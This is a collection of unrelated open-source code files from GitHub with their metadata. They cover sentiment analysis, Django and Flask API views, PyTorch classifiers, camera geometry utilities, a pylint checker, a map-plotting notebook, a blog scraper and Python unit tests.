keyword += ' ' + stemmedVar
return keyword
#Word Cloud
def word_cloud():
keywords_list = ''
for key,value in tweetDict.iteritems():
keyword = remove_stop_words(value[1])
keywords_list += ' ' + keyword
wordcloud = WordCloud().generate(keywords_list)
plt.imshow(wordcloud)
plt.axis("off")
wordcloud = WordCloud(max_font_size=40).generate(keywords_list)
plt.figure()
plt.imshow(wordcloud)
plt.axis("off")
plt.show()
| dhanashriOstwal/electionSentimentAnalysis | Python Scripts/sentimentAnalysis.py | sentimentAnalysis.py | py | 3,158 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "nltk.stem.porter.PorterStemmer",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "string.punctuation",
"line_number": 38,
"usage_type": "attribute"
},
{
"api_name": "stri... |
29450013209 | from ..models import Comment
from ..serializers import CommentSerializer
from rest_framework.response import Response
from rest_framework import permissions, generics
from rest_framework.authtoken.models import Token
from rest_framework.status import HTTP_403_FORBIDDEN
class CommentDetail(generics.RetrieveUpdateDestroyAPIView):
permission_classes = (permissions.IsAuthenticatedOrReadOnly, )
queryset = Comment.objects.all()
serializer_class = CommentSerializer
def put(self, request, *args, **kwargs):
comment = Comment.objects.get(pk=kwargs['pk'])
## Check if the request was sent by the writer
token = request.headers['Authorization'].split()[1]
id = Token.objects.get(pk=token).user.profile
if comment.writer != id:
return Response({"You don't have permissions to perform this action."}, status=HTTP_403_FORBIDDEN)
request.data['parent_meeting'] = comment.parent_meeting.id
request.data['writer'] = comment.writer.id
return self.update(request, *args, **kwargs)
class CommentList(generics.ListCreateAPIView):
permission_classes = (permissions.IsAuthenticatedOrReadOnly, )
queryset = Comment.objects.all()
serializer_class = CommentSerializer
def post(self, request, *args, **kwargs):
token = request.headers['Authorization'].split()[1]
profile = Token.objects.get(pk=token).user.profile
request.data['writer'] = profile.id
return self.create(request, *args, **kwargs)
| thunderlink/ThunderFish | backend/server/views/comment.py | comment.py | py | 1,520 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "rest_framework.generics.RetrieveUpdateDestroyAPIView",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.generics",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "rest_framework.permissions.IsAuthenticatedOrReadOnly",
"line_... |
2911463134 | import torch.nn as nn
import torch.nn.functional as F
class NeuralNet(nn.Module):
def __init__(self):
super(NeuralNet, self).__init__()
self.conv1 = nn.Conv2d(1, 3, kernel_size=(3, 3), stride=1, padding=0)
self.conv2 = nn.Conv2d(3, 6, kernel_size=(4, 4), stride=1, padding=0)
self.maxpool1 = nn.MaxPool2d(kernel_size=(3, 3), stride=2, padding=0)
self.fullCon1 = nn.Linear(in_features=6 * 11 * 11, out_features=360)
self.fullCon2 = nn.Linear(in_features=360, out_features=100)
self.fullCon3 = nn.Linear(in_features=100, out_features=10)
def forward(self, x):
x = F.relu(self.conv1(x))
x = self.maxpool1(F.relu(self.conv2(x)))
x = x.view(-1, 6 * 11 * 11)
x = F.relu(self.fullCon1(x))
x = F.relu(self.fullCon2(x))
x = self.fullCon3(x)
return x
| arunsanknar/AlectioExamples | image_classification/fashion-mnist-and-mnist/model.py | model.py | py | 870 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_numbe... |
12152753848 | import numpy as np
import plotly
import plotly.graph_objects as go
def normalize_cam_points(P,x,N):
"""
Normalize the camera matrices and the image points with normalization matrices N.
:param P: ndarray of shape [n_cam, 3, 4], the cameras
:param x: ndarray of shape [n_cam, 3, n_points], the projected image points
:param N: ndarray of shape [n_cam, 3, 3], the normalization matrices
:return: norm_P: ndarray of shape [n_cam, 3, 4], the normalized cameras
norm_x: ndarray of shape [n_cam, 4, n_points], the normalized image points
"""
assert x.shape[1] == 3, "x must be in homographic coordinates"
norm_P = N @ P
norm_x = N @ x
return norm_P, norm_x
def reprojection_errors(P, X, x, visible_points):
"""
Projects the 3D points in X to the cameras P and computes the distance to the real image points x.
:param P: ndarray of shape [n_cam, 3, 4], the cameras
:param X: ndarray of shape [4, n_points], the predicted 3D points
:param x: ndarray of shape [n_cam, 3, n_points], the projected image points
:param visible_points: boolean matrix of shape [n_cam, n_points], what cameras see what points
:return: errors: ndarray of shape [n_cam, n_points], in the ij entry has ||x_ij - pflat(P_i*X_j)||.
The errors in the non-visible entries should be np.nan
"""
assert x.shape[1] == 3, "x must be in homographic coordinates"
proj = P @ X
proj = proj / proj[:,[-1],:]
errors = np.linalg.norm(proj - x, axis=1)
visible_errors = np.where(visible_points, errors, np.nan)
return visible_errors
def decompose_camera_matrix(P, K):
"""
Decompose camera matrices to R and t s.t P[i] = K*R^T[I -t]
:param P: ndarray of shape [n_cam, 3, 4], the cameras
:param K: ndarray of shape [n_cam, 3, 3], the calibration matrices
:return: R: ndarray of shape [n_cam, 3, 3]
t: ndarray of shape [n_cam, 3]
"""
Rt = np.linalg.inv(K) @ P
Rs = np.transpose(Rt[:, :, :3],(0,2,1))
ts = np.squeeze(-Rs @ np.expand_dims(Rt[:, 0:3, 3], axis=-1))
return Rs, ts
def pflat(x):
return x/x[-1]
def plot_cameras(P, K, X, title='reconstruction'):
"""
Plot a 3D image of the points and cameras
:param P: ndarray of shape [n_cam, 3, 4], the cameras
:param K: ndarray of shape [n_cam, 3, 3], the calibration matrices
:param X: ndarray of shape [4, n_points], the predicted 3D points
:param title: the name of the plot
"""
R,t = decompose_camera_matrix(P, K)
data = []
data.append(get_3D_quiver_trace(t, R[:, :3, 2], color='#86CE00', name='cam_learn'))
data.append(get_3D_scater_trace(t.T, color='#86CE00', name='cam_learn', size=1))
data.append(get_3D_scater_trace(X[:3,:], '#3366CC', '3D points', size=0.5))
fig = go.Figure(data=data)
path = title+'.html'
plotly.offline.plot(fig, filename=path, auto_open=False)
def get_3D_quiver_trace(points, directions, color='#bd1540', name=''):
assert points.shape[1] == 3, "3d cone plot input points are not correctely shaped "
assert len(points.shape) == 2, "3d cone plot input points are not correctely shaped "
assert directions.shape[1] == 3, "3d cone plot input directions are not correctely shaped "
assert len(directions.shape) == 2, "3d cone plot input directions are not correctely shaped "
trace = go.Cone(
name=name,
x=points[:, 0],
y=points[:, 1],
z=points[:, 2],
u=directions[:, 0],
v=directions[:, 1],
w=directions[:, 2],
sizemode='absolute',
sizeref=0.5,
showscale=False,
colorscale=[[0, color], [1, color]],
anchor="tail"
)
return trace
def get_3D_scater_trace(points, color, name,size=0.5):
assert points.shape[0] == 3, "3d plot input points are not correctely shaped "
assert len(points.shape) == 2, "3d plot input points are not correctely shaped "
trace = go.Scatter3d(
name=name,
x=points[0, :],
y=points[1, :],
z=points[2, :],
mode='markers',
marker=dict(
size=size,
color=color,
)
)
return trace
| antebi-itai/Weizmann | Multiple View Geometry/Assignment 5/Solution/code/utils.py | utils.py | py | 4,188 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.linalg.norm",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "numpy.linalg",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "numpy.where",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "numpy.nan",
"line... |
22355103302 | # coding: utf-8
import os
import random
import time
import cv2
import numpy as np
import torch
from torch import nn, optim
from tqdm import tqdm
import matplotlib.pyplot as plt
import modules
class Classifier:
chinese_characters = ['云', '京', '冀', '吉', '宁', '川', '新', '晋', '桂', '沪',
'津', '浙', '渝', '湘', '琼', '甘', '皖', '粤', '苏', '蒙',
'藏', '豫', '贵', '赣', '辽', '鄂', '闽', '陕', '青', '鲁',
'黑']
other_characters = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9',
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'J', 'K',
'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'U', 'V',
'W', 'X', 'Y', 'Z']
def __init__(self, load_path=None, dataset_path=None, train_proportion=0.8, save_path=None, is_chinese=True):
if torch.cuda.is_available():
torch.set_default_tensor_type('torch.cuda.FloatTensor')
if load_path:
self.cnn = torch.load(load_path)
elif is_chinese:
self.cnn = modules.MyCNN(len(self.chinese_characters))
else:
self.cnn = modules.MyCNN(len(self.other_characters))
self.characters = self.chinese_characters if is_chinese else self.other_characters
self.character_dict = dict([(c, i) for i, c in enumerate(self.characters)])
self.train_images, self.train_labels = ([], []) if not dataset_path else self.read_dataset(dataset_path)
self.eval_images, self.eval_labels = ([], [])
self.train_proportion = train_proportion
self.save_path = save_path
def predict(self, images, batch_size=8, to_character=True):
"""
Predict labels.
"""
images = np.array(images, )
pred_labels = []
self.cnn.eval()
for start in range(0, len(images), batch_size):
outputs = self.cnn(torch.tensor(images[start:start + batch_size], dtype=torch.float32))
pred_labels += outputs.softmax(1).argmax(1).tolist()
return [self.characters[idx] for idx in pred_labels] if to_character else pred_labels
def train(self, num_epochs, train_batch_size=8, method='adam', lr=0.01, momentum=0, do_eval=True,
eval_batch_size=8):
"""
Train, and evaluate if specified.
"""
assert train_batch_size > 0 and eval_batch_size > 0
optimizer = self.get_optimizer(method=method, lr=lr, momentum=momentum)
train_accuracy_list = []
eval_accuracy_list = []
for epoch in range(num_epochs):
self.shuffle_dataset()
# Train
print('-' * 20 + 'Training epoch %d' % epoch + '-' * 20, flush=True)
time.sleep(0.1)
num_correct = 0
for start in tqdm(range(0, len(self.train_images), train_batch_size), desc='Training batch: '):
images = self.train_images[start:start + train_batch_size]
actual_labels = self.train_labels[start:start + train_batch_size]
# Forward
images = torch.tensor(np.array(images), dtype=torch.float32)
outputs = self.cnn(images)
# Backward
batch_labels = torch.tensor(actual_labels, dtype=torch.int64)
self.cnn.zero_grad()
loss = nn.CrossEntropyLoss()(outputs, batch_labels)
loss.backward()
optimizer.step()
# Calculate metrics
pred_labels = outputs.softmax(1).argmax(1).tolist()
num_correct += np.equal(pred_labels, actual_labels).sum()
acc = num_correct / len(self.train_images)
print('Accuracy:', acc)
train_accuracy_list.append(acc)
self.save_cnn(str(epoch) + '.pth')
# Evaluate
if not do_eval:
continue
num_correct = 0
print('-' * 20 + 'Evaluating epoch %d' % epoch + '-' * 20, flush=True)
time.sleep(0.1)
for start in tqdm(range(0, len(self.eval_images), eval_batch_size), desc='Evaluating batch: '):
images = self.eval_images[start:start + eval_batch_size]
actual_labels = self.eval_labels[start:start + eval_batch_size]
# Forward
images = torch.tensor(images, dtype=torch.float32)
outputs = self.cnn(images)
# Get results
pred_labels = outputs.softmax(1).argmax(1).tolist()
num_correct += np.equal(pred_labels, actual_labels).sum()
acc = num_correct / len(self.eval_images)
print('Accuracy:', acc)
eval_accuracy_list.append(acc)
plt.plot(train_accuracy_list)
plt.plot(eval_accuracy_list)
plt.legend(['train', 'eval'])
plt.show()
def get_optimizer(self, method='adam', lr=0.01, momentum=0):
if method == 'sgd':
return optim.SGD(self.cnn.parameters(), lr=lr, momentum=momentum)
elif method == 'adam':
return optim.Adam(self.cnn.parameters(), lr=lr)
else:
return None
def shuffle_dataset(self):
images = self.train_images + self.eval_images
labels = self.train_labels + self.eval_labels
seed = time.time()
random.seed(seed)
random.shuffle(images)
random.seed(seed)
random.shuffle(labels)
split_index = int(self.train_proportion * len(images))
self.train_images, self.train_labels = images[:split_index], labels[:split_index]
self.eval_images, self.eval_labels = images[split_index:], labels[split_index:]
def save_cnn(self, name):
if not self.save_path:
return None
elif not os.path.exists(self.save_path):
os.makedirs(self.save_path)
torch.save(self.cnn, os.path.join(self.save_path, name))
def read_dataset(self, path):
print('-' * 20 + 'Reading data' + '-' * 20, flush=True)
images, labels = [], []
for character in tqdm(self.characters):
current_dir = os.path.join(path, character)
for file_name in os.listdir(current_dir):
file_path = os.path.join(current_dir, file_name)
image = cv2.imdecode(np.fromfile(file_path, dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
label = self.character_dict[character]
images.append(image)
labels.append(label)
return images, labels
| QQQQQby/Car-Plate-Recognition | classifier.py | classifier.py | py | 6,613 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torch.cuda.is_available",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "torch.set_default_tensor_type",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": ... |
15980397887 | """Check for usage of models that were replaced in 2.0."""
from pylint.checkers import BaseChecker
from pylint.interfaces import IAstroidChecker
class NautobotReplacedModelsImportChecker(BaseChecker):
"""Visit 'import from' statements to find usage of models that have been replaced in 2.0."""
__implements__ = IAstroidChecker
version_specifier = ">=2,<3"
name = "nautobot-replaced-models"
msgs = {
"E4211": (
"Imports a model that has been replaced (dcim.DeviceRole -> extras.Role).",
"nb-replaced-device-role",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/extras/#replace-role-related-models-with-generic-role-model",
),
"E4212": (
"Imports a model that has been replaced (dcim.RackRole -> extras.Role).",
"nb-replaced-rack-role",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/extras/#replace-role-related-models-with-generic-role-model",
),
"E4213": (
"Imports a model that has been replaced (ipam.Role -> extras.Role).",
"nb-replaced-ipam-role",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/extras/#replace-role-related-models-with-generic-role-model",
),
"E4214": (
"Imports a model that has been replaced (dcim.Region -> dcim.Location).",
"nb-replaced-region",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/dcim/#replace-site-and-region-with-location-model",
),
"E4215": (
"Imports a model that has been replaced (dcim.Site -> dcim.Location).",
"nb-replaced-site",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/dcim/#replace-site-and-region-with-location-model",
),
"E4216": (
"Imports a model that has been replaced (ipam.Aggregate -> ipam.Prefix).",
"nb-replaced-aggregate",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/ipam/#replace-aggregate-with-prefix",
),
}
def visit_importfrom(self, node):
if node.modname == "nautobot.dcim.models":
for name, _ in node.names:
if name == "DeviceRole":
self.add_message("nb-replaced-device-role", node=node)
elif name == "RackRole":
self.add_message("nb-replaced-rack-role", node=node)
elif name == "Region":
self.add_message("nb-replaced-region", node=node)
elif name == "Site":
self.add_message("nb-replaced-site", node=node)
if node.modname == "nautobot.ipam.models":
for name, _ in node.names:
if name == "Role":
self.add_message("nb-replaced-ipam-role", node=node)
elif name == "Aggregate":
self.add_message("nb-replaced-aggregate", node=node)
| nautobot/pylint-nautobot | pylint_nautobot/replaced_models.py | replaced_models.py | py | 3,231 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "pylint.checkers.BaseChecker",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "pylint.interfaces.IAstroidChecker",
"line_number": 9,
"usage_type": "name"
}
] |
26034310554 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
# In[2]:
commercial = pd.read_csv('./commercial.csv')
commercial
# In[3]:
# 끝에 5개 데이터만 추출
commercial.tail(5)
# In[5]:
list(commercial), len(list(commercial))
# In[7]:
commercial.groupby('상가업소번호')['상권업종소분류명'].count().sort_values(ascending=False)
# In[10]:
category_range = set(commercial['상권업종소분류명'])
category_range, len(category_range)
# In[11]:
commercial['도로명주소']
# In[15]:
# 서울시 데이터만 가져오기
# 3덩어리로 쪼갠 후 새로운 칼럼 추가
commercial[['시','구','상세주소']] = commercial['도로명주소'].str.split(' ',n=2, expand=True)
# In[16]:
commercial.tail(5)
# In[18]:
# 서울특별시의 데이터만 추출
seoul_data = commercial[ commercial['시'] == '서울특별시']
seoul_data.tail(5)
# In[22]:
# 서울만 있는지 확인하기(집합연산)
city_type = set(seoul_data['시'])
city_type
# In[24]:
# 서울 치킨집만 추출
seoul_chicken_data = seoul_data[ seoul_data['상권업종소분류명'] == '후라이드/양념치킨' ]
seoul_chicken_data
# In[31]:
sorted_chicken_count_by_gu = seoul_chicken_data.groupby('구')['상권업종소분류명'].count().sort_values(ascending=False)
sorted_chicken_count_by_gu
# In[33]:
import matplotlib.pyplot as plt
plt.rcParams['font.family'] = 'Malgun Gothic'
# In[34]:
plt.figure(figsize=(10,5))
plt.bar(sorted_chicken_count_by_gu.index, sorted_chicken_count_by_gu)
plt.title('구에 따른 치킨 매장 수')
plt.xticks(rotation = 90)
plt.show()
# In[38]:
# 지도에 그리기
import folium
import json
# In[41]:
# 지도정보 불러오기
seoul_geo = './seoul_geo.json'
geo_data = json.load(open(seoul_geo, encoding = 'utf-8'))
geo_data
# In[50]:
# 지도 만들기
map = folium.Map(location=[37.5502, 126.982], zoom_start=11)
map
# In[51]:
folium.Choropleth(geo_data = geo_data,
data=sorted_chicken_count_by_gu,
colums=[sorted_chicken_count_by_gu.index, sorted_chicken_count_by_gu],
fill_color='PuRd',
key_on='properties.name').add_to(map)
map
# In[ ]:
| dleorud111/chicken_data_geo_graph | 치킨 매장 수에 따른 지도 그리기.py | 치킨 매장 수에 따른 지도 그리기.py | py | 2,238 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.rcParams",
"line_number": 98,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 98,
"usage_type": "name"
},
{
"api_name": "mat... |
27823324545 | import requests
from bs4 import BeautifulSoup
import zlib #crc32加密
list_cyc32=[]
list_url=[]
import re
# # 为了用xpath
user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'
headers = {'User-Agent': user_agent}
# url="https://www.cnblogs.com/mayswind/p/15116918.html"
url="https://www.cnblogs.com/mayswind/default.html?page=3"
r = requests.get(url, headers=headers)
r.encoding = 'utf-8'
result=[]
soup=BeautifulSoup(r.text,'lxml')
#############crc32加密 只需要传str类型就行################
def crc32(x_url):
return zlib.crc32(bytes(x_url, "utf-8"))
#############crc32加密 只需要传str类型就行################
############ 传入url 得到soup###########################
def get_soup (url):
user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'
headers = {'User-Agent': user_agent}
r = requests.get(url, headers=headers)
r.encoding = 'utf-8'
result=[]
soup = BeautifulSoup(r.text, 'lxml')
return soup
############ 传入url 得到soup###########################
#############找到作者所有的文章##########################
def fd_all(url):
global list_cyc32
for i in range(1, 9999):
url = "/".join(url.split("/")[0:4]) + "/default.html?page=" + str(i)
if (get_soup(url).find_all(name='a', attrs={'class': 'postTitle2 vertical-middle'}) == []):
break
items = get_soup(url).find_all(name='a', attrs={'class': 'postTitle2 vertical-middle'})
for i in items:
list_cyc32 = crc32(i.get('href'))
list_url=i.get('href')
#############找到作者所有的文章##########################
print(crc32(url))
print(list_url) | Madlife1/pythonProject2 | url_spider.py | url_spider.py | py | 1,896 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "zlib.crc32",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_nu... |
14551208863 | from fractions import Fraction
from hypothesis import given
from jubeatools import song
from jubeatools.formats.timemap import TimeMap
from jubeatools.testutils import strategies as jbst
from jubeatools.utils import group_by
@given(jbst.timing_info(with_bpm_changes=True), jbst.beat_time())
def test_that_seconds_at_beat_works_like_the_naive_approach(
timing: song.Timing, beat: song.BeatsTime
) -> None:
time_map = TimeMap.from_timing(timing)
expected = naive_approach(timing, beat)
actual = time_map.fractional_seconds_at(beat)
assert actual == expected
def naive_approach(beats: song.Timing, beat: song.BeatsTime) -> Fraction:
if beat < 0:
raise ValueError("Can't compute seconds at negative beat")
if not beats.events:
raise ValueError("No BPM defined")
grouped_by_time = group_by(beats.events, key=lambda e: e.time)
for time, events in grouped_by_time.items():
if len(events) > 1:
raise ValueError(f"Multiple BPMs defined on beat {time} : {events}")
sorted_events = sorted(beats.events, key=lambda e: e.time)
first_event = sorted_events[0]
if first_event.time != song.BeatsTime(0):
raise ValueError("First BPM event is not on beat zero")
if beat > sorted_events[-1].time:
events_before = sorted_events
else:
last_index = next(i for i, e in enumerate(sorted_events) if e.time >= beat)
events_before = sorted_events[:last_index]
total_seconds = Fraction(0)
current_beat = beat
for event in reversed(events_before):
beats_since_previous = current_beat - event.time
seconds_since_previous = (60 * beats_since_previous) / Fraction(event.BPM)
total_seconds += seconds_since_previous
current_beat = event.time
total_seconds = total_seconds + Fraction(beats.beat_zero_offset)
return total_seconds
| Stepland/jubeatools | jubeatools/formats/konami/eve/tests/test_timemap.py | test_timemap.py | py | 1,881 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "jubeatools.song.Timing",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "jubeatools.song",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "jubeatools.song.BeatsTime",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_na... |
12336375941 | #!/usr/bin/python3
"""
Defines requests for the drivers route
"""
from api.v1.views import app_views
from flask import jsonify, request, make_response
from functools import wraps
from hashlib import md5
from models import storage
from models.users import User
import datetime
import jwt
SECRET_KEY = 'thisissecret'
def token_required(f):
"""
checks given token if valid to access route
"""
@wraps(f)
def decorated(*args, **kwargs):
token = None
if 'x-access-token' in request.headers:
token = request.headers['x-access-token']
if not token:
return jsonify({'message' : 'Token is missing!'}), 401
try:
data = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])
except Exception:
return jsonify({'message' : 'Token Expired, Please Log In Again!'}), 401
users = storage.all(User).values()
current_user = None
for user in users:
if user.id == data['id']:
current_user = user
if not current_user:
return jsonify({'message' : 'Token is invalid!'}), 401
return f(current_user, *args, **kwargs)
return decorated
@app_views.route('/login', strict_slashes=False, methods=['POST'])
def login():
"""
validates user login before assigning a json web token
"""
body = request.get_json()
all_users = storage.all(User).values()
user = None
for item in all_users:
if item.email == body.get("email"):
user = item
break
if not user:
return (make_response(jsonify({"error": "Invalid Username"}), 401,
{'WWW-Authenticate' : 'Basic realm="Login required!"'}))
if user.check_password(body.get("password")):
token = jwt.encode(
{'id' : user.id,
'exp' : datetime.datetime.utcnow() + datetime.timedelta(hours=24)
}, SECRET_KEY, algorithm='HS256')
response = jsonify({'token' : token,
"user": {
"id": user.id,
"first_name": user.first_name,
"last_name": user.last_name,
"phonenumber": user.phonenumber,
"email": user.email
}})
return response, 200
return (make_response(
'Invalid Password', 401,
{'WWW-Authenticate' : 'Basic realm="Login required!"'}))
| NamasakaLennox/Msimu | backend/api/v1/auth.py | auth.py | py | 2,555 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.request.headers",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "flask.request.headers",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "f... |
29524986199 | import os
import tempfile
import time
import unittest
from Tools import ValkyrieTools
class TestTools(unittest.TestCase):
    """Unit tests for the helpers in ``Tools.ValkyrieTools``.

    Covers the type predicates (isFloat/isInteger/isBoolean/isList/isDict/
    isJson), string-to-value coercion (matchDict), human readable formatting,
    id/code generation, markdown conversion, hashing and file-system helpers.
    """
    def test_isFloat(self):
        self.assertTrue(ValkyrieTools.isFloat('1.0'))
        self.assertFalse(ValkyrieTools.isFloat(1))
    def test_isInteger(self):
        self.assertTrue(ValkyrieTools.isInteger(1))
        self.assertFalse(ValkyrieTools.isInteger(1.3))
    def test_isBoolean(self):
        # Expected contract: the words True/False/Yes/No and the ints 1/0
        # count as booleans, but the strings '1'/'0' do not.
        self.assertTrue(ValkyrieTools.isBoolean('True'))
        self.assertTrue(ValkyrieTools.isBoolean('False'))
        self.assertTrue(ValkyrieTools.isBoolean('Yes'))
        self.assertTrue(ValkyrieTools.isBoolean('No'))
        self.assertFalse(ValkyrieTools.isBoolean('1'))
        self.assertFalse(ValkyrieTools.isBoolean('0'))
        self.assertTrue(ValkyrieTools.isBoolean(1))
        self.assertTrue(ValkyrieTools.isBoolean(0))
        self.assertFalse(ValkyrieTools.isBoolean('Maybe'))
    def test_isList(self):
        self.assertTrue(ValkyrieTools.isList([1, 2, 3]))
        self.assertFalse(ValkyrieTools.isList({'a': 1, 'b': 2}))
    def test_isDict(self):
        self.assertTrue(ValkyrieTools.isDict({'a': 1, 'b': 2}))
        self.assertFalse(ValkyrieTools.isDict([1, 2, 3]))
    def test_isJson(self):
        self.assertTrue(ValkyrieTools.isJson('{"key": "value"}'))
        self.assertFalse(ValkyrieTools.isJson('invalid_json'))
    def test_matchDict(self):
        # matchDict should coerce every string value to its "real" type;
        # unparseable strings (like "Maybe") are passed through unchanged.
        test_dict = {
            "a": "1", "b": "2", "c": "3", "d": "True", "e": "false", "f": "Yes", "g": "NO",
            "h": "1.3", "i": "1.0", "j": "5", "k": "Maybe", "l": "[1, 2, 3]", "m": "{'a': 1, 'b': 2}"
        }
        expected_result = {'a': 1, 'b': 2, 'c': 3, 'd': True, 'e': False, 'f': True, 'g': False,
                           'h': 1.3, 'i': 1.0, 'j': 5, 'k': 'Maybe', 'l': [1, 2, 3], 'm': {'a': 1, 'b': 2}}
        self.assertEqual(ValkyrieTools.matchDict(test_dict), expected_result)
    def test_formatSize(self):
        # NOTE(review): expected strings imply decimal (1000-based) units.
        self.assertEqual(ValkyrieTools.formatSize(1000000000), '1.00 GB')
        self.assertEqual(ValkyrieTools.formatSize(1000000), '1.00 MB')
        self.assertEqual(ValkyrieTools.formatSize(1000), '1.00 KB')
        self.assertEqual(ValkyrieTools.formatSize(500), '500.00 B')
    def test_formatSpeed(self):
        self.assertEqual(ValkyrieTools.formatSpeed(1000000), '1.00 MB/s')
        self.assertEqual(ValkyrieTools.formatSpeed(1000), '1.00 KB/s')
        self.assertEqual(ValkyrieTools.formatSpeed(500), '500.00 B/s')
    def test_formatTime(self):
        self.assertEqual(ValkyrieTools.formatTime(1000000), '11.57 days')
        self.assertEqual(ValkyrieTools.formatTime(3600), '1.00 hours')
        self.assertEqual(ValkyrieTools.formatTime(120), '2.00 minutes')
        self.assertEqual(ValkyrieTools.formatTime(30), '30.00 seconds')
    def test_formatNumber(self):
        self.assertEqual(ValkyrieTools.formatNumber(1234567.89), '1,234,567.89')
    def test_generateHwid(self):
        # As this function generates a unique hardware ID, it's difficult to test for a specific result.
        # You can verify that it returns a non-empty string, for example.
        hwid = ValkyrieTools.generateHwid()
        self.assertTrue(hwid)
    def test_generateCode(self):
        code_length = 32
        generated_code = ValkyrieTools.generateCode(code_length)
        self.assertEqual(len(generated_code), code_length)
    def test_markdownHtml(self):
        markdown_text = '**Hello** *World*!'
        expected_html = '<b>Hello</b> <i>World</i>!'
        self.assertEqual(ValkyrieTools.markdownHtml(markdown_text), expected_html)
    def test_getHash(self):
        # Precomputed digests for the fixed payload below.
        data = b'This is some data to hash'
        expected_md5_hash = 'fbe8ee5bbfd9ec0c6f1949ba2ac9e0d7'
        expected_sha1_hash = '6acc0ca14c9cd14671c1034a36396066c00ad053'
        expected_sha256_hash = '09b0d6cdcb1dc978740a4510cfbce9308423817d78447a7345bafc2950c8ff7b'
        expected_sha512_hash = '6b0e3ed391e918823f5faf249c3e077ad9f5681d1d9b6c19f4e669caae3d8abefbf0bb9d443150ab62632e69554d0d22ae6be9c70334005ba0566bd6c2eff822'
        self.assertEqual(ValkyrieTools.getHash(data, 'md5'), expected_md5_hash)
        self.assertEqual(ValkyrieTools.getHash(data, 'sha1'), expected_sha1_hash)
        self.assertEqual(ValkyrieTools.getHash(data, 'sha256'), expected_sha256_hash)
        self.assertEqual(ValkyrieTools.getHash(data, 'sha512'), expected_sha512_hash)
    def test_getFileHash(self):
        # Write a known payload to a temp file; digests below match it.
        # NOTE(review): delete=False file is never removed — leaks a temp file.
        file_content = "This is the file content."
        temp_path = tempfile.gettempdir()
        temp_file = tempfile.NamedTemporaryFile(dir=temp_path, delete=False)
        temp_file.write(file_content.encode('utf-8'))
        temp_file.close()
        expected_md5_hash = '066f587e2cff2588e117fc51a522c47e'
        expected_sha1_hash = '7a2dc28ce65f9b346523bd0e2f177d3b7357aba1'
        expected_sha256_hash = 'dc9dbf28907435fb339baac4eb2b386538570c20ba1fcd3373f9c24d95a84ff4'
        expected_sha512_hash = 'b345bc4c99404c161d67793aa412d8120a9831cfa4f307a8e8b8b290530665b17675106f5d6eebfdc0a82e43d2d4207a6485d5ff8d8dc124d0e20681d150a609'
        self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'md5'), expected_md5_hash)
        self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'sha1'), expected_sha1_hash)
        self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'sha256'), expected_sha256_hash)
        self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'sha512'), expected_sha512_hash)
    def test_getFileData(self):
        file_content = b'This is the file content.'
        with tempfile.NamedTemporaryFile(delete=False) as temp_file:
            temp_file.write(file_content)
            temp_file_path = temp_file.name
        self.assertEqual(ValkyrieTools.getFileData(temp_file_path), file_content)
    def test_getFileSize(self):
        file_content = b'This is the file content.'
        with tempfile.NamedTemporaryFile(delete=False) as temp_file:
            temp_file.write(file_content)
